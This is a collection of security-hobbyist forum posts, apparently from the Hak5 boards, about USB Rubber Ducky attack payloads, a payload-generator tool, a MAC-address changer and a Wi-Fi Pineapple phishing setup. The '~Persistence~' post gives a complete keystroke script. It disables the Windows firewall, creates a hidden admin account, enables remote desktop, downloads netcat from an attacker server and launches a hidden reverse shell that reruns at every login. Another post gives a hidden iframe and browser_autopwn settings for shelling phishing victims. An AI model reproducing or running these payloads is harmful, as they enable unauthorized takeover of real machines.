[[PAYLOAD] ~Persistence~ Windows 7 w/UAC]

~Persistence~ has been added to the Simple-Ducky Payload Generator. See the forum post below for a link to download :)

~skysploit

http://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v14-international-key-mappingkali-linux-compatible/

[[Question] Using the duck in VirtualBox]

I have been unsuccessful at getting Windows 7 and OS X payloads to work with VirtualBox. But Windows XP, Vista, Server 2003, and all the Linux Distros i have tried work just fine. VMPlayer works great for Windows 7. I would be interested to see if anyone out there has been successful at getting VirtualBox working with WIndows 7...

[[PAYLOAD] ~Persistence~ Windows 7 w/UAC]

Hello,

Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it...

1. Opens an admin command prompt
2. Creates an admin user (default creds: hacker | mysecretpassword)
3. Disables the windows firewall
4. Enables remote desktop
5. Enables remote assistance
6. Hides the newly created admin account from the Windows Welcome Screen
7. Creates a VBScript to run a hidden instance of Netcat
8. Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop)
9. Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start)
10. Calls the VBScript to launch the hidden netcat shell
11. Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)

So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.

~skysploit

DELAY 5000
ESCAPE
DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
DELAY 300
ENTER
DELAY 800
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING copy con nc.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
STRING echo cmdow @ /hid >> nc.bat
ENTER
STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe');
ENTER
STRING cscript nc.vbs
ENTER
STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
ENTER
STRING echo cmdow @ /hid >> persistence.bat
ENTER
STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
ENTER
STRING exit
ENTER

[[Question][Payload] Help with http download and execute.]

You can download the simple-ducky payload generator. It has two different versions of the download and execute payload built in. One will yield you a User priv shell and the other an Admin priv shell. Here's the link; https://code.google.com/p/simple-ducky-payload-generator/

~skysploit

[[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)]

Hi would this work with international keyboards ?

Version 1.0.2 now supports international keyboards. Please download it and try it out as I have not been able to test the payloads using international key mappings. Let me know if you have any issues getting it to run.

[[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)]

Hello,

In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listener's.The Simple-Ducky currently uses version 2.6 of the duck encoder. The lastest version of the Simple-Ducky supports all Debian Linux distro's (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you.

With the simple-ducky in a matter of seconds you can;

* Create your evil executable (its automatically placed in your web directory)

* Create your inject.bin

* Launch a listener (meterpreter or netcat)

* Generate custom password list's

* Crack extracted passwords

* And so much more...

Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distro's as long as you install the required dependencies (see the wiki page for other than Kali installs).

Installation

Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal.The install script now supports all Debian based Linux distro's.

Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/

There are now two options to install the simple ducky....

Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=
root@kali:~# chmod +x installer_v1.1.1_debian.sh
root@kali:~# ./installer_v1.1.1_debian.sh
root@kali:~# rm installer_v1.1.1_debian.sh

To run the program; root@kali:~# simple-ducky

Change Log

v1.1.1 Changes

1. Added tons of new features; Shells with dbd (incredibly powerful see video below) and the Custom Payload Builder

2. Cleaned up menu options, dependecies, and porcesses

3. Made bug fixes to several payloads

4. Replaced Netcat with Ncat

v1.1.0 Changes

1. Upgraded the encoder to version 2.6

2. Made changes to the main menu

3. Added a new payload: LM/NTLM Hash Dump from a Live System

4. Added a new function: LM/NTLM Password Hasher

5. Added a new tool: Site2lst Custom Wordlist Builder

6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distro's (Tested on: Kali-Linux, Ubuntu and Linux Mint

v1.0.9 Changes

1. Added a new payload subset titled "Forced Phishing & Web Attacks"

2. Intergrated: SE-Toolkikt, Metasploit's Browser_Autopwn, and BurpSuite.

3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack

4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn

5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite

v1.0.8 Changes

1. Added OSX Single User Mode Reverse Shell Payload

2. Made minor scripting changes

3. Changed Encoder to version 2.5

4. Fixed bugs in the FTP Server Setup option

5. Created a User add function for the FTP Server Setup Option

v1.0.7 Changes

1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)

v1.0.6 Changes

1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)

* The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed)

2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it)

3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee)

4. Added a new function that configures the Pure-FTPD server for the user

v1.0.5 Changes

1. Complete Payload and Menu Revamp

v1.0.4 Changes

1. Added ~Persistence~ Payload

2. Updated Menu Options

v1.0.3 Changes

1. Payload Update

2. Added 64bit JDK Update Support

3. Added initial delay function (allows you to set a custom delay for driver install time).

4. Changed encoder version from 2.4 to 3.0

v1.0.2 Changes

1. International keyboard mapping added. -- Tester's would be greatly appreciated.

2. Aesthetic changes to text.

v1.0.1 Changes

1. Payload Update

2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!

Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com

~skysploit

[[Question] DuckEncoder not working for me.]

Can you post the syntax that you are using for the encoder? Have you tried running it through http://www.iducke.com/Encoder/IDE?

[[Tutorial] Ducklings 101]

Great post! Thanks.

[MDKarma Script]

Foxtrot, thanks for sharing... I'm going to start testing out the script. I'll have some feedback in a few days.

~skysploit

[1 Man, 1 Macbook Air, 1 Yagi, 1 Mark Iv And A Whole Lota Pwnin]

I have nothing to add but great read... I was strapped to my seat the whole time :)

[Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!]

Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation.

If i have my laptop i dont need a pineapple - wifi adapter works as fine.

Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.

[Quick and easy macchanger script]

Guys,

Here's a quick script for changing your mac address. Simply run the script and enter the network card you would like to change. You will see your new mac address as well as your original mac. Enjoy!

~skysploit

#!/bin/sh

# This script will change your MAC address"
# Usage: ./mac-me.sh
# Script by skysploit
clear
echo "What interface would you like to change. Example; eth0"
echo ""
read ADAPTER;
 clear
echo "Entering stealth mode "
echo ""
ifconfig $ADAPTER down
macchanger -r $ADAPTER
ifconfig $ADAPTER up
echo ""
echo "Your MAC Adrress has been changed, it will reset upon reboot";
echo "If this script failed: <apt-get install macchanger> and run as root"

[Pineapple Theme - Gray & Black]

Though the green CSS theme is pretty slick, it doesn't match my desktop. And everyone knows how picky hackers can be.... Anyhow, here's my CSS script. Now that I have shown you mine, please show me yours.

~skysploit

.navbar {
	top:10px;
	min-width:80%;
	background:gray;
        padding-left: 5px;
        padding-right: 5px;
        padding-top: 3px;
        padding-bottom: 3px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
	text-align:center;
	color:black;
}

.content {
        font-family: monospace;
	min-width: 700px;
	max-width: 700px;
	text-align:center;
	margin: 0 auto;
}

.contentTitle {
        text-align:left;
	padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background:gray;
        font-weight:bold;
        font-size:15;
	color: black;
}

.contentContent {
	text-align:left;
        padding-left: 10px;
	padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        background:black;
        min-height: 40px;
        color:white;
        border-color: gray;
        border-style: solid;
        border-width: 1px
}

.sidePanelLeft {
	position:absolute;
	top:50px;
	text-align:left;
	min-width:300px;
	font-family: monospace;
}

.sidePanelRight {
        position:absolute;
	right:1%;
        top:50px;
        text-align:left;
        min-width:300px;
        font-family: monospace;
}


.sidePanelTitle {
        padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background:gray;
        font-weight:bold;
        font-size:15;
	color:white;
	
}

.sidePanelContent {
        padding-left: 10px;
        padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;        
	background:black;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
	min-height: 40px;
        color:white;
        border-color: gray;
        border-style: solid;
        border-width: 1px
}
.moduleTitle {
        padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background:gray;
        font-weight:bold;
        font-size:15;
	color: white;
}

.moduleContent {
        padding-left: 10px;
        padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        background:black;
        min-height: 40px;
        color:white;
        border-color: gray;
        border-style: solid;
        border-width: 1px
}

.modules {
        position:absolute;
        right: 20%;
        left: 20%;
        font-family: monospace;
}

.moduleContent td {
	border-width: 15px;
	border-spacing: 20px;
	border-style: solid;
	border-color: black;
	border-collapse: collapse;
	color: white;
}

body {
	font-family: monospace;
	color:white;
	background:black;
	text-align:center;
}

a {
        color:white;
}

input[type=text], input[type=password] {
        font-family:courier;
        border: 1px;
        background-color:black; 
	color:white; 
	border-style:dotted;
}

pre {
	white-space: pre-wrap;       /* css-3 */
	white-space: -moz-pre-wrap;  /* Mozilla, since 1999 */
	white-space: -pre-wrap;      /* Opera 4-6 */
	white-space: -o-pre-wrap;    /* Opera 7 */
	word-wrap: break-word;       /* Internet Explorer 5.5+ */
}

[Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!]

Wait... Pineapple's firmware includes metasploit framework? Get outta town!

crepsidro, I have not personally tried to run msf on the pineapple. I dont think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There's multiple ways to this, below is the way I typically setup my connections.

1. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
2. Using Backtrack runnning in a VM, connect both the wireless card and the ethernet port to the VM (yes, i pull both resources from the hosting machine to the VM).
3. Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the networks gateway address.
4. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above)

Hope this helps.

~skysploit

[Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!]

That's a great idea! I will have to go back and play around with the java payload. :)

[Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!]

So, here's a simple change that could pay out big (in a pinch) on a pentest...

How does it work?

It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.

How to set it up.

1. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
2. Open msfconsole and "use auxiliary/server/browser_autopwn"
3. Set the options below (n00b's, let Google be your guide)
4. Turn on "DNS Spoof" from the main page of the Pineapple.
5. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.

Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.

Side note: Pentesting at Starbucks can get you put in jail...

Happy (responsible) hacking!
~skysploit

iframe (add this to the end of the script)

"iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/"                                
Note: replace the " " at the beginning and end with < > 

Settings for browser_autopwn

msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name           Current Setting   Required       Description
   ----           ---------------   --------       -----------
   LHOST            172.16.42.42      yes          The IP address to use for reverse-connect payloads
   SRVHOST          172.16.42.42      yes          The local host to listen on. 
   SRVPORT          8080              yes          The local port to listen on.
   SSL              false             no           Negotiate SSL for incoming connections
   SSLCert                            no           Path to a custom SSL certificate 
   SSLVersion       SSL3              no           Specify the version of SSL that should be used
   URIPATH          /hacked           no           The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > exploit

.......
(Server build process was pulled out)
.......

[*] --- Done, found 53 exploit modules